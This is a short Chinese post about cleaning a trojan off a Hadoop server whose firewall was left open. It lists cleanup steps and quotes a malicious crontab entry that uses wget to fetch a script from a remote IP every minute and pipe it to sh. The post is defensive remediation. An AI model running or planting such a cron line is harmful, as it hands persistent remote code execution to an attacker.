在我刚开始学习时,把防火墙,安全组都开放了,过了一段时间被挂上了木马。并且杀死进程一会还启动
解决办法
1通过命令netstat -antlp|grep 9002查看端口文件地址,删除可以文件(java文件夹)
2.还得在安全组中关闭hadoop一些对外开放的web页面(可以改变端口号)
3.在/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/下查看可以文件,查看文件里的命令,
例如:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
这些就是可疑的命令,把他删除